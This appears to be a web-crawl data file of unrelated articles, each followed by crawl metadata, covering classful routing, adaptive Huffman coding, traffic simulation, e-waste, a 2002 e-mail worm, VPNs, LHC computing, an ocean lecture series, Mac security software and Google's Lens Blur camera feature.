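For readers following along, the classful lookup behaviour described in the answer is easy to mimic: derive the Class A/B/C network from the first octet, check whether the routing table knows any subnet of that classful network, and only fall back to the default route when it knows none. The sketch below is a simplified model of that logic in Python, with an invented routing table; it is not Cisco IOS behaviour byte-for-byte.

    # Simplified model of classful route lookup (i.e. "ip classless" disabled).
    # Routing-table contents are invented for illustration.
    import ipaddress

    def classful_network(ip):
        first = int(ip.split(".")[0])
        if first < 128: return ipaddress.ip_network(f"{ip}/8", strict=False)    # Class A
        if first < 192: return ipaddress.ip_network(f"{ip}/16", strict=False)   # Class B
        if first < 224: return ipaddress.ip_network(f"{ip}/24", strict=False)   # Class C
        raise ValueError("not a Class A/B/C unicast address")

    routes = [ipaddress.ip_network(n) for n in ["10.1.1.0/24", "10.1.2.0/24"]]
    default_route = "0.0.0.0/0"

    def classful_lookup(dest):
        net = classful_network(dest)
        addr = ipaddress.ip_address(dest)
        known_subnets = [r for r in routes if r.subnet_of(net)]
        if known_subnets:
            # Router knows this classful network: match a subnet or drop.
            for r in known_subnets:
                if addr in r:
                    return str(r)
            return "DROP (classful network known, subnet missing)"
        return default_route  # unknown classful network: default route is used

    print(classful_lookup("10.1.1.1"))    # matches 10.1.1.0/24
    print(classful_lookup("10.9.9.9"))    # dropped: 10.0.0.0/8 is known, subnet is not
    print(classful_lookup("172.16.5.5"))  # falls through to the default route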
<urn:uuid:74198a20-f39a-4f4f-8c30-0edc15454923>
CC-MAIN-2017-04
http://networking-forum.com/viewtopic.php?f=46&t=30655&view=previous
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00018-ip-10-171-10-70.ec2.internal.warc.gz
en
0.901958
388
2.640625
3
If there are x levels in a Huffman tree, read the node values on each level l_x from left to right. When you have exhausted level l_x, move up a level to l_(x-1) and repeat the process. Continue until you have moved up to the root node (and, thus, have read the value of every node in the tree). You should notice an interesting pattern - the values always remain the same or increase. This is called the sibling property of Huffman trees. It tells us that given a node n, its sibling s(n) is the node on the same level as n to the right. If n is the rightmost node on its level, s(n) is the leftmost node on the previous level. If v_n is the value of node n, we know that v_s(n), the value of the sibling, will be greater than or equal to v_n. If you understand this property, understanding the rest of this algorithm is a breeze. One of the drawbacks of static Huffman compression algorithms is the need to transmit the character frequency tally with the compressed text. While an intelligently encoded table only adds about 250 bytes (on average) to a compressed image, it would be nice to get rid of it altogether. This seems to be impossible because without the table's data the decompression routine would not know the structure of the Huffman tree used to encode the compressed data and therefore would not be able to ascertain the proper codeword to character mappings. However, adaptive Huffman compression algorithms overcome the need to store the character counts by beginning with a mostly empty tree. They then build up and fill in the tree as they go. The Huffman trees generated by adaptive algorithms are dynamic, meaning they change in structure as the statistical tendencies of the text change. The compression function adds each new character encountered to the tree. The algorithm does not, however, compress the character the first time it is seen. Instead, the character is passed on to the compressed text as is (in fact, a special flag character is pre-pended to it, as we will discuss in the next paragraph). When the compression system sees a character already present in the tree, it increments that character's count by one, adjusts the tree accordingly, and uses the compression code in the output stream. The complementary decompression routine operates in much the same manner - when a new character is encountered it is added to the dynamic Huffman tree but otherwise left alone. When a code is found, it is decoded and the weight of the corresponding character is increased. This increase may cause the tree to be reorganized. The way that plain (non-compressed) characters and (compressed) codewords are distinguished in the compressed stream is by use of a flag or escape character. This symbol, when encountered, signifies that the next byte is a literal character. All other data is assumed to be codes. The escape symbol is one of the only items present in the initial Huffman tree. When the decompression subroutine runs across the code for an escape symbol, it immediately reads a byte from the input, adds it to the tree, and sends it to output. Note that I am not talking about the escape character here (ASCII 27) but rather a made-up symbol that has a node on the Huffman tree. This symbol, of course, produces no output in the uncompressed stream - its sole function is to convey a message from the compression routine to the decompression routine about the character following it in the stream. The complicated part of this algorithm, as you might expect, is the tree manipulation.
It is unreasonable to reconstruct the entire Huffman tree every time a symbol is added to it. But recall from the opening paragraph of this section that all Huffman trees must obey the sibling property. Imagine the steps of incrementing a Huffman node's weight: first, since all characters are stored at the leaves of the tree, we will add one to the count of a leaf. We must now make sure the tree follows the sibling property. If our incremented leaf, i, has a larger value than its sibling then the sibling rule is broken. When the sibling property has been broken, matters can be fixed by swapping the offending incremented node i with its sibling. This will not always work, though. Imagine that there is a node n with value 5. Its immediate sibling is node o with value 5 also. The immediate sibling of o is node p, also with value 5. (That is, there are three leaf nodes in a row, all value 5). Now we increment node n to 6. The sibling property is broken because now n has a larger value than its right sibling, o (which is still 5). Swapping the two would be a problem because n is also larger than o's sibling, p. The proper way to restore the sibling property when it has been violated by an incrementation is to loop over the siblings starting with the immediate sibling of the incremented node. Continue to loop while the value of the nodes encountered stays the same. Break out of the loop when the value changes. Swap the incremented node with the last node in the run of same values:

    if (node[i].value > node[i+1].value) {
        /* The sibling property is broken: walk to the end of the run of
           siblings that still hold the old (smaller) value. */
        val = node[i+1].value;
        j = i + 1;
        while (node[j].value == val)
            j++;
        /* Swap the incremented node with the last node in that run. */
        swap(node[i], node[j-1]);
    }

The above code assumes, of course, that we can traverse along siblings by simply moving to adjacent positions in a node array. In order to implement an adaptive Huffman algorithm, it should be easy to find the sibling of a given node many times in a row.
<urn:uuid:dfd12f2c-bdd4-4774-9578-cf70a5122925>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/alg/node173.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00320-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915634
1,258
2.828125
3
The explanation that New Jersey closed access lanes on the heavily traveled George Washington Bridge for a "traffic study" is a head scratcher for traffic engineers. Engineers today use so-called microscopic traffic simulations to create virtual environments that can model driver behavior to road changes with exacting detail. There's plenty of data available for the simulations. One of the best sources is video camera systems that use software to count vehicles on roadways. The simulation software can model the impact of road changes with precision and without any need to close lanes to test theories, according to several traffic engineers interviewed by Computerworld. There is no evidence, in documents released late last week by investigators, that the Port Authority of New York and New Jersey considered computer models in lieu of a real world action. The Port Authority manages bridges and tunnels, airports, ports, and other critical systems in that region. Instead, the Port Authority shut down two of the three access lanes for four days last September from Fort Lee to the George Washington Bridge without warning the public, citing a "traffic study." After the lanes were closed, many people complained about it to the Port Authority, public officials and to local newspapers. The Port Authority was accused by one woman of "playing God with people's jobs" in a call to a Port Authority official, who made a note of it. It was among the documents released last week. People weren't just late for work due to the disruption. School buses and emergency vehicles were also delayed by an action that has led to multiple investigations of the administration of Republican Gov. Chris Christie. Some of the governor's top appointees orchestrated the lane closings, apparently as a type of retribution against Fort Lee's Democratic mayor, Mark Sokolich, documents have shown. "Time for some traffic problems in Fort Lee," wrote Gov. Chris Christie aide Bridget Anne Kelly to David Wildstein, the Port Authority's director of interstate and capital projects, who complied. Real traffic engineering is a meticulous, safety-focused undertaking with some powerful software tools to work with. "You certainly do not have to close lanes physically," said Joseph Hummer, chair of the Civil and Environmental Engineering Department at Wayne State University. The impact of a lane closure can be modeled. Those models are accurate in the short term, plus or minus a couple of percent, on measures such as travel time and delay, he said. There is software available to project traffic changes 30 years out and give "good enough" answers for long-range planning purposes. The most accurate tools, for microscopic analysis, include equations for measuring the traffic flow of individual vehicles, which is something that gets to driver behavior, said Hummer. A microscopic analysis can simulate when a driver changes lanes, speeds up, slows down, how closely they follow the car in front of them, and the speed at which they follow, among other variables. It can update measurements every one-tenth of a second, said Hummer. It is expensive software to run and is only used on big projects -- such as lane closures. The economic cost of the New Jersey lane closures more than justifies its use, Hummer says.
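To make "microscopic simulation" concrete, here is a heavily simplified single-lane car-following loop in Python: each vehicle updates its speed from the gap to the car ahead on a small time step, which is the basic mechanism such tools use to estimate travel time and delay when a lane is closed. The model and its constants are invented for illustration and bear no relation to any commercial traffic package.

    # Extremely simplified single-lane car-following simulation.
    # Each vehicle adjusts speed toward a gap-limited target every 0.1 s.
    # All constants are invented; real microscopic models are far richer.

    DT = 0.1            # time step, seconds
    MAX_SPEED = 30.0    # m/s (about 67 mph)
    ACCEL = 1.5         # m/s^2, acceleration/braking bound
    MIN_GAP = 8.0       # desired standstill gap, metres
    HEADWAY = 1.5       # desired time headway, seconds

    def step(positions, speeds):
        new_speeds = []
        for i, (x, v) in enumerate(zip(positions, speeds)):
            if i == 0:
                target = MAX_SPEED                      # lead car: free flow
            else:
                gap = positions[i - 1] - x              # distance to car ahead
                target = min(MAX_SPEED, max(0.0, (gap - MIN_GAP) / HEADWAY))
            accel = max(-ACCEL, min(ACCEL, target - v)) # bounded speed change
            new_speeds.append(max(0.0, v + accel * DT))
        return ([x + v * DT for x, v in zip(positions, new_speeds)], new_speeds)

    # Ten cars queued 10 m apart, all starting from rest (e.g. behind a closure).
    positions = [100.0 - 10.0 * i for i in range(10)]
    speeds = [0.0] * 10
    for _ in range(int(60 / DT)):                       # simulate one minute
        positions, speeds = step(positions, speeds)
    print("last car has moved", round(positions[-1] - 10.0, 1), "metres in 60 s")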
<urn:uuid:6b4fa208-9585-4be9-bbd2-f709e753d29a>
CC-MAIN-2017-04
http://www.computerworld.com/article/2487638/business-intelligence/a-new-jersey--traffic-study--wouldn-t-need-lane-closings.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00136-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954997
651
2.515625
3
Developing countries risk creating giant mountains of electronic waste as their consumption of PCs and gadgets increases, the UN has warned. According to a new report from the United Nation Environment Programme, certain parts of Asia, Africa and Latin America are set to see a rise in sales of electronics over the coming decade. And unless countries such as India and China step up measures to properly collect and recycle these materials, the resulting waste poses a substantial risk to public health and the environment. Issued at a meeting of world chemical authorities, the report took data from 11 developing countries to estimate current and future e-waste generation. This includes old desktop and notebook computers, printers, mobile phones, pagers, digital cameras and mp3 players. The UNEP predicts that in India e-waste from old computers will have shot up by 500 per cent by 2010, compared to 2007 levels. In South Africa and China this increase is predicted to be between 200 and 400 per cent. According to the report, most e-waste in China is improperly handled, with much of it incinerated by backyard recyclers to recover precious metals like gold.
<urn:uuid:66797f3e-c2ec-4489-98c6-e00cfeae1400>
CC-MAIN-2017-04
http://www.pcr-online.biz/news/read/developing-nations-could-face-e-waste-mountains/022737
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00530-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929917
232
3.03125
3
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. The worm, called W32/Chet-A or "Chet", accompanies an e-mail with the subject "All People!" sent from the address email@example.com. The Chet worm is stored within an attached file named 11september.exe and is activated only when an e-mail recipient opens the attachment. Like other e-mail worms, most notably the NIMDA worm that appeared last year and infected computers worldwide, the Chet worm attempts to use a computer's e-mail program and address book to spread copies of itself to other computer systems. Worms can damage the computers on which they are run, or disable computer networks through massive copying and e-mailing. Unlike the NIMDA worm, Chet does not appear to pose a serious threat to the systems it infects. "This worm is not going to be a major problem," said Mikko Hyppönen, manager of Anti-Virus Research at F-Secure, which discovered the worm. "There is a bug in the code that crashes the worm after it runs for a while." The bug prevents the Chet worm from e-mailing copies of itself and generally leaves host systems unaffected, said Hyppönen. "Some users may receive a Dr Watson report, but [Windows] and e-mail will continue to function," he said. Despite its flawed code, however, the Chet worm is capable of infecting computers and replicating itself, Hyppönen warned. "We found that under certain conditions, the virus was able to recover from its code error and continue running," said Hyppönen, adding that systems running the Windows 98 operating system and containing very long names in the Windows address book are particularly vulnerable to infection by Chet. Makers of leading antivirus software rushed to post new virus definitions protecting against the Chet worm, despite the low risk posed by the worm.
<urn:uuid:bc480a21-5759-4787-a680-ab7dff1f7dcd>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240047459/Cyber-attacks-fail-to-materialise-as-just-one-9-11-e-mail-worm-emerges
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00440-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948086
430
2.609375
3
A VPN (virtual private network) provides a network connection across a large physical distance, and it can run over both private networks and public networks such as the Internet. In simple terms, a VPN makes it possible for individual clients, or whole LANs on the far side of the Internet, to connect to the main LAN premises and behave, technically, as if they were locally attached to that site. This includes obtaining a local IP address from the local DHCP pool, being able to use whatever LAN resources the administrator has made available, and so on. These characteristics make a VPN a type of WAN (wide area network). Its purpose is to support file sharing, video conferencing and similar network services. Such services are already available through other mechanisms and technologies, but a VPN makes remote resources more efficient to use and improves data sharing and communication. Above all, the technology can be deployed at relatively low cost.
Technologies behind a VPN
A number of network protocols, such as PPTP, L2TP, IPsec and SOCKS, can be employed in a VPN. These protocols carry out authentication (verifying users) and encryption (hiding sensitive data from the rest of the online public). With the help of tunneling, a VPN can use the existing hardware infrastructure of the Internet or an intranet. Three different modes of VPN are possible, serving the following purposes: remote client connections over the Internet, LAN-to-LAN internetworks, and restricted access inside an intranet.
VPNs for remote connectivity over the Internet
To increase the mobility of an organization's workers and keep them connected to the company's networks, a VPN deployment can be a good solution. It handles the problem of distance and provides protected access to the organization's offices over the Internet. In this client/server arrangement, the remote user first logs on to his or her ISP (Internet service provider) and then connects to the company's VPN server. Once the connection between the remote client and the server is established, the client can communicate with internal company systems over the Internet in the same way a local host would. A Cisco VPN client can be employed for strongly protected connectivity; with these devices, an encrypted tunnel is established for remote employees.
VPN extended network
A virtual private network can also link two networks together for remote access. In such cases, the combined remote network can in turn be linked to another company's network. This kind of extended network is possible with a VPN server plus a connection to that server. After reviewing the payback attached to VPN networking, downloading a Cisco VPN client may well appeal to an organization.
Certain system requirements should be met in order to benefit from such networks:
- Windows 98 or a newer Microsoft operating system, Mac OS X, Linux, or Solaris
- A VPN (Cisco) client compatible with the VPN (Cisco) servers: VPN 3000 series concentrator 3.0 software or later, IOS Software 12.2(8)T or later, etc.
- PPTP, L2TP/IPsec, L2TP or another VPN tunneling protocol
<urn:uuid:b83aa06d-8c64-48d6-aceb-c452c35a0b16>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2011/vpn
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00072-ip-10-171-10-70.ec2.internal.warc.gz
en
0.90522
744
3.203125
3
The global distributed computing system known as the Worldwide LHC Computing Grid (WLCG) brings together resources from more than 150 computing centers in nearly 40 countries. Its mission is to store, distribute and analyze the 25 petabytes of data generated each year by the Large Hadron Collider (LHC), based out of the European Laboratory for Particle Physics (CERN) in Geneva, Switzerland. Projects of this magnitude require significantly more computational resources than can be delivered by one facility, hence the need for a multi-organizational, international grid computing system. This infrastructure supports the science that makes discoveries like the Higgs boson possible. Even more capacity will be required going forward. It is predicted that datasets must increase by 2-3 orders of magnitude to realize the full potential of this scientific instrument. Keeping LHC computing relevant in the coming years will require significant advances on the hardware side. Starting around 2005, processors began hitting their scaling limits, owing mostly to their tremendous power demand. This challenge has driven interest in new processor architectures other than general-purpose x86-64 processors. This situation has inspired an international team of distinguished scientists to examine the viability of the ARM processor and the Intel Xeon Phi coprocessor for scientific computing. They've written a paper describing their experience porting software to these processors and running benchmarks using real physics applications. Their goal is to assess the potential of these processors to be utilized for production physics processing. For the ARM investigation, the test setup included two low-cost development boards, the ODROID-U2 and the ODROID-XU+E, each sporting eMMC and microSD slots, multiple USB ports and 10/100Mbps Ethernet with an RJ-45 port. Each uses a 5V DC power adaptor. The authors write that "the processor on the U2 board is an Exynos 4412 Prime, a System-on-Chip (SoC) produced by Samsung for use in mobile devices. It is a quad-core Cortex A9 ARMv7 processor operating at 1.7GHz with 2GB of LP-DDR2 memory. The processor also contains an ARM Mali-400 quad-core GPU accelerator, although that was not used for the work described in this paper." They continue: "The XU+E board has a more recent Exynos 5410 processor, with 4 Cortex-A15 cores at 1.6GHz and 4 Cortex-A7 cores at 1.2GHz, in ARM's big.LITTLE configuration, with 2GB of LDDR3 memory, as well as a PowerVR SGX544MP3 GPU (also not used in this work)." For the Phi investigations, the team created a basic HEP software development environment to support application and benchmark tests which can run directly on the Phi card. The setup employed a Xeon Phi 7110P card attached to an Intel Xeon box with 32 logical cores. The paper delves further into the hardware and software specifics for each test environment as well as the various challenges and limitations they encountered. There is also a discussion of experimental results and general tools support. The authors make the point that "when comparing and optimizing for various architectures, understanding the performance obtained in detail is as important as obtaining overall benchmark numbers." As could be predicted, single-core performance is much lower for the ARMv7 processor than for traditional x86 processors, but the performance per watt is much improved for the ARM chips.
The authors conclude “the potential for use in scientific (general purpose) computing is clear.” They also report “successful ports of both the IgProf profiler and the DMTCP checkpointing package to ARMv7.” Despite these positive initial tests, more work is needed before there is a clear answer on the benefits of these alternative architectures for HEP computing. The paper describing this research has been submitted to proceedings of the 20th International Conference on Computing in High Energy and Nuclear Physics (CHEP13), Amsterdam.
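The efficiency comparison in the paper ultimately comes down to dividing a benchmark score by the power drawn while it ran. The few lines of Python below show that arithmetic; the system names and numbers are placeholders invented for illustration, not figures taken from the paper:

# Performance-per-watt comparison with made-up numbers (illustrative only).
systems = {
    # name: (benchmark score in GFLOP/s, measured power draw in watts) -- assumed
    "ARMv7 dev board": (6.0, 5.0),
    "x86-64 server": (250.0, 400.0),
    "Xeon Phi card": (900.0, 300.0),
}
for name, (gflops, watts) in systems.items():
    per_watt = gflops / watts   # GFLOP/s delivered per watt consumed
    print(f"{name:16s} {gflops:8.1f} GFLOP/s {watts:6.1f} W {per_watt:6.2f} GFLOP/s per watt")

Even with real measurements, such a ranking depends on what the power figure includes (whole system or processor only), which is consistent with the authors' point that overall benchmark numbers need detailed interpretation.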
<urn:uuid:6653bf30-04d5-4649-b491-89e314a5d265>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/11/11/alternatives-x86-physics-processing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00284-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923015
829
3.109375
3
NEWPORT BEACH, CA--(Marketwired - Mar 11, 2014) - The depths of the sea and the farthest reaches of outer space have something in common: They're both extreme environments. This has led scientists to value the benefits of underwater training for astronauts. Until now, however, access to an appropriate undersea environment has been limited, at best. That's all about to change. As part of a lecture series on ocean-related subjects, NASA engineer Bill Todd will share the story of the new research vessel, SeaOrbiter, currently under construction. He will present information on this topic in two lectures titled "Origins of SeaOrbiter" at the ExplorOcean headquarters in Newport Beach on Thursday, March 27 at 4 and 7 p.m. The public is invited to attend. Todd, who specializes in astronaut training systems, is set to discuss SeaOrbiter's unusual origin and significant value to scientific exploration. In an unusual move for the scientific community, French researchers sourced crowd-funding to build the vessel, with missions planned for the Mediterranean and Atlantic. Chief among its benefits, the ship will offer marine biologists long-term access to the world's oceans as well as host astronauts-in-training. According to the SeaOrbiter website, the vessel will work as "a space simulator which accommodates astronauts in a pressurized area. Living conditions in this pressurized habitat are similar to the conditions found in space." For astronauts and aquanauts, SeaOrbiter continues the legacy of Jules Verne, Jacques Piccard and Jacques-Yves Cousteau. Todd's lecture is part of a series offered by the nonprofit organization ExplorOcean, America's premier ocean literacy center. ExplorOcean's monthly lecture series is free to members and costs $15 per talk for non-members. The series runs each month through May and will feature guest speakers including Dr. Kevin Hand of the Deep Sea Challenger Expedition and Dr. Ana Širović, marine bioacoustician at the Scripps Institution of Oceanography. The series is offered as part of ExplorOcean's mission to inspire, educate and engage the explorer within. All lectures will take place at 600 East Bay Ave., Newport Beach, California. ABOUT EXPLOROCEAN: ExplorOcean, America's premier ocean literacy center, offers a world-class ocean literacy platform and cultural destination where visitors can immerse themselves in interactive exhibitions devised to develop the curious explorer within. ExplorOcean's high-quality programs, which are grounded in the seven principles of ocean literacy and in STEM content, include single-day camps, multi-day camps, classes, monthly lectures and an impressive underwater robotics program developed by the director of education, Dr. Wendy Marshall. Headquartered on the Balboa Peninsula between the sparkling Pacific Ocean and the bustling Newport Harbor, the center's nearly two-acre location is the perfect place for people of all ages to learn about the seven seas. For more information about ExplorOcean, please visit www.ExplorOcean.org.
<urn:uuid:6c9978c3-ea41-4041-ae5d-cac1221e63a7>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/explorocean-presents-mastering-the-sea-space-connection-1887751.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00192-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93435
626
2.78125
3
Most attacks these days are financially motivated, which means cybercriminals are trying to get at either your data or your computer's processing power to make money by spewing spam on your behalf or by stealing your identity. They're after the names and numbers in your address book and want to access your social networking sites and steal your personal data (social security or credit card numbers, bank account information, etc.). What's More Valuable, Financial Info or Login Details? You might be surprised to know your social networking login details can often be worth more to cybercriminals than your financial information, because there are many protections for consumers against financial fraud but next to none for online accounts like email and social networking. Your social information gives hackers access to your friends on those networks, who then become susceptible to cybercriminal attacks as well. Need an example? Think of your financial information as a car dealership and your social networking details as a discount store. The discount store carries a ton of items sold for little profit but sells products all the time, while the car dealership sells fewer items at a lower frequency but at a much greater profit. Most cyberattackers work more like a discount store than a car dealership. Financial data is only worth a few bucks for each account, and social networking data isn't worth a whole lot more. But criminals work to gather enough low-ticket pieces of information to sell in bulk to rack up a big payday. High-ticket items like corporate or government secrets take a lot more skill to get, because they're usually much better protected. However, that doesn't mean you shouldn't protect your financial data. Both types of information are valuable to cybercriminals, but many focus the bulk of their efforts on the discount store because it contains lucrative low-hanging fruit that hackers of all abilities are all too eager to pick. How Cybercriminals Attack You There are two main ways cybercriminals can attack you: the first is by luring you into running malware that opens up your system to them, and the second is by hacking into your accounts or computer directly. Thankfully, there are ways to protect your machine against these attacks. Some methods are effective against both types of attack, while others are more specialized tools. The most fundamental rule of data security is that no one technology holds the key to protecting everything. It's important to have multiple layers of protection so the weaknesses of one technology are covered by the strengths of the others. By using a suite of security tools, you can best protect yourself against whatever attacks cybercriminals throw your way. Let's go over the different layers of security and paint a scenario where your computer is a castle built to protect your precious treasure (your data) from dragons and pillagers (hackers and cybercriminals). The following are multiple safeguards to ensure the treasure inside your castle stays secure. Firewalls: The Gatekeeper of Network Traffic Firewalls like Intego Net Barrier 2013 are like the keepers of the castle gates. They allow you to permit or deny things that go in or out of your machine. A firewall asks you whether to allow unknown applications to connect out from your computer and unknown recipients to connect in (or cross the moat and enter the castle). And for files or users it has seen before, it will block or permit them according to what you have specified may pass into or out of your machine.
For instance, if you have someone you would like to allow to share your files, you can accept their incoming connection while still keeping out strangers. Or if you're surfing on a compromised website and it surreptitiously downloads a brand new piece of malware on your machine, the firewall can stop that malware in its tracks before it can send your valuable data back out to the cybercriminal. Your firewall can raise or lower the drawbridge accordingly to make sure that only trusted visitors are allowed inside your castle. Anti-Virus: The Security Inside Your Castle Most people are familiar with anti-virus software; it's the most popular way to protect against malware attacks, and it's an essential tool to get your system back to normal if you are affected by malware. Intego Virus Barrier 2013 is our anti-malware tool that does both these jobs. Virus Barrier is the equivalent of the guards within your castle walls. It has both an on-demand and an on-access scanner so you can choose whether to scan quickly or thoroughly, depending on your needs. It's a good idea to keep your on-access scanner going at all times so it can scan files as you access them. That way, any malware that you come across will be detected before it can run and do damage to your system or steal your data. Think of the on-access scanner as the guards who work in your castle on a regular basis, tasked with protecting your treasure from intruders. If you were planning a special feast or celebration and instructed your guards to check the dining hall to make sure it's safe, that's the equivalent of an on-demand scan. You'd want to schedule it to run once in a while as an extra measure of assurance or if you suspect something fishy is going on with your machine. Automatic updates make it simple to keep your machine continuously updated against all the latest threats (like showing your guards "Wanted" posters of new thieves and criminals so they know who to look out for). All in all, Virus Barrier is designed to be a method of protection against code that seeks to do you harm, one that you can set up and rely on without giving it too much thought. Data Scrubbing: A Map That Locates Your Hidden Treasure One of the trickiest things about protecting your valuable data is being aware of where exactly it resides on your machine. Do you know the exact whereabouts of all the treasure in your castle? Some apps and actions can store sensitive data all over the place, far away from where you would ever think to look. Cybercriminals know this and don't limit their searches to the obvious locations. Intego Identity Scrubber identifies exactly where specific sensitive information is on your computer so you can better protect your data in the event someone does manage to cross the moat and get past the guards. Running Identity Scrubber will let you know where information such as credit card numbers, social security or driver license numbers, bank account information, passwords, telephone numbers, and any custom data resides so you can better protect it with encryption or choose to delete it. This way, cybercriminals will have a much harder time grabbing information that might be useful for identity theft. Working Together to Create Layers of Security When combined, all these tools make your machine a less profitable target for cybercriminals. With Virus Barrier and Net Barrier, your machine is less likely to be breached in the first place.
And if they're still somehow able to get in, Identity Scrubber will help you keep cybercriminals' efforts from being worthwhile. Each of these products is offered in both Intego Mac Internet Security Premium and Intego Mac Premium Bundle to make sure your castle and its treasure are protected in multiple effective ways. In a world where too few people take security seriously, you don't need to have your system so locked down that it's unusable, or to have a degree in computer science to understand how to keep yourself safe. You can have a simple, layered security system that doesn't bog you down.
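The core idea behind a data-scrubbing tool can be sketched in a few lines: walk through files and flag strings that look like sensitive data. The Python example below is not Intego's product, only a rough illustration of pattern-based detection written for this article; the regular expressions are simplified assumptions and would produce both false positives and misses in practice:

import re
from pathlib import Path

# Very rough patterns for data that often needs protecting (simplified assumptions).
PATTERNS = {
    "credit card number": re.compile(r"\b(?:\d[ -]?){15}\d\b"),
    "US Social Security number": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "phone number": re.compile(r"\b\d{3}[-.]\d{3}[-.]\d{4}\b"),
}

def scan(root):
    # Report which plain-text files under 'root' contain strings matching the patterns.
    for path in Path(root).rglob("*.txt"):
        text = path.read_text(errors="ignore")
        for label, pattern in PATTERNS.items():
            if pattern.search(text):
                print(f"{path}: possible {label}")

scan(".")   # scan text files under the current directory

A real product scans many more file types and formats, but the principle is the same: you cannot encrypt or delete sensitive data until you know where it lives.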
<urn:uuid:ec1e9c73-c7d3-4a6e-9727-08d9be93e80d>
CC-MAIN-2017-04
https://www.intego.com/mac-security-blog/how-a-cyber-criminal-steals-information-off-your-computer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00008-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940115
1,563
2.921875
3
Google Brings Lens Blur to Mobile Phone Cameras It's been just about impossible to artistically create a blurry foreground or background in a photo taken with a mobile phone or tablet camera because the small lenses don't display "depth of field." "One of the biggest advantages of SLR cameras over camera phones is the ability to achieve shallow depth of field and bokeh effects," wrote Carlos Hernandez, a Google software engineer, in an April 16 post on the Google Research Blog. "Shallow depth of field makes the object of interest 'pop' by bringing the foreground into focus and de-emphasizing the background. Achieving this optical effect has traditionally required a big lens and aperture, and therefore hasn't been possible using the camera on your mobile phone or tablet." With Lens Blur, which is a new mode in the Google Camera app, users can take a photo with a shallow depth of field using an Android phone or tablet and then change the point or level of focus after the photo is taken, wrote Hernandez. "You can choose to make any object come into focus simply by tapping on it in the image. By changing the depth-of-field slider, you can simulate different aperture sizes, to achieve bokeh effects, ranging from subtle to surreal (e.g., tilt-shift). The new image is rendered instantly, allowing you to see your changes in real time." Lens Blur achieves the effect using algorithms that simulate a larger lens and aperture, he wrote. "Instead of capturing a single photo, you move the camera in an upward sweep to capture a whole series of frames. From these photos, Lens Blur uses computer vision algorithms to create a 3D model of the world, estimating the depth (distance) to every point in the scene." After processing the information, the app re-renders the photo, "blurring pixels by differing amounts, depending on the pixel's depth, aperture and location relative to the focal plane," he wrote. "The algorithms used to create the 3D photo run entirely on the mobile device, and are closely related to the computer vision algorithms used in 3D mapping features like Google Maps Photo Tours and Google Earth." Google Camera works on phones and tablets running Android 4.4+ KitKat. Google often creates new effects and features for digital photographers. In December 2013, Google added the ability for users to include some flashy and decorative twinkles and snow to their online holiday photographs.
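A toy version of the technique helps show what the per-pixel re-rendering involves: once every pixel has a depth estimate, blur it by an amount that grows with its distance from the chosen focal plane. The Python sketch below uses NumPy, a synthetic image and a fake depth map; it illustrates the logic only and is not Google's algorithm:

import numpy as np

def box_blur(img, radius):
    # Cheap box blur: average each pixel over a (2*radius+1)^2 neighborhood.
    if radius == 0:
        return img.astype(float)
    padded = np.pad(img, radius, mode="edge")
    out = np.zeros_like(img, dtype=float)
    size = 2 * radius + 1
    for dy in range(size):
        for dx in range(size):
            out += padded[dy:dy + img.shape[0], dx:dx + img.shape[1]]
    return out / (size * size)

def lens_blur(image, depth, focal_depth, strength=6.0):
    # Blur each pixel in proportion to how far its depth is from the focal plane.
    radii = np.clip((np.abs(depth - focal_depth) * strength).astype(int), 0, 8)
    levels = {r: box_blur(image, r) for r in np.unique(radii)}   # precompute blur levels
    result = np.zeros_like(image, dtype=float)
    for r, blurred in levels.items():
        result[radii == r] = blurred[radii == r]
    return result

h, w = 64, 64
image = np.random.rand(h, w)                          # stand-in for a photo
depth = np.tile(np.linspace(0.0, 1.0, w), (h, 1))     # fake depth map: far on the right
foreground_sharp = lens_blur(image, depth, focal_depth=0.1)   # refocus on the near side
background_sharp = lens_blur(image, depth, focal_depth=0.9)   # refocus on the far side
print(foreground_sharp.shape, background_sharp.shape)

Changing focal_depth after the fact is the equivalent of tapping a different object in the app, and raising strength mimics opening up the simulated aperture.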
<urn:uuid:1082d32a-686d-4e23-8a8d-5528f9b1ae11>
CC-MAIN-2017-04
http://www.eweek.com/blogs/upfront/google-brings-lens-blur-to-mobile-phone-cameras.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00522-ip-10-171-10-70.ec2.internal.warc.gz
en
0.91414
503
2.75
3
